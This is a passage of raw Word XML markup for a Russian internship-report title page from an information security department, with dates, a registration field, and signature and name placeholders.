          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000226">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:jc w:val="right"/>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27">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000228">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:bottom w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000229">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">июня</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022F">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2021 г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000230">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31">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232">
            <w:pP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23B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000250">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Регистрационный №</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:bottom w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000258">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5A">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5B">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Практика пройдена в срок</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000265">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:jc w:val="right"/>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66">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000267">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:bottom w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000268">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">июня</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026E">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2021 г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026F">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70">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71">
            <w:pPr>
              <w:ind w:left="-150" w:firstLine="150"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">с</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000272">
            <w:pPr>
              <w:ind w:left="-150" w:firstLine="150"/>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73">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000274">
            <w:pPr>
              <w:ind w:left="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:bottom w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000275">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">февраля</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2021 г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027A">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84">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85">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86">
            <w:pPr>
              <w:ind w:left="-150" w:firstLine="150"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">по</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000287">
            <w:pPr>
              <w:ind w:left="-150" w:firstLine="150"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">«</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000288">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000289">
            <w:pPr>
              <w:ind w:left="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:bottom w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">июня</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2021 г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:bottom w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028F">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95">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>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296">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Е.В. Третьяк</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000299">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9A">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="9"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">на предприятии</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(подпись)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(И.О. Фамилия)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AE">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AF">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="9"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="cente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gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B9">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C3">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C4">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>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2C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Кафедра информационной </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CE">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D8">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D9">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>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2DA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">безопасности  ШЕН ДВФУ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E3">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ED">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002EE">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>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2EF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F8">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000322">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000337">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
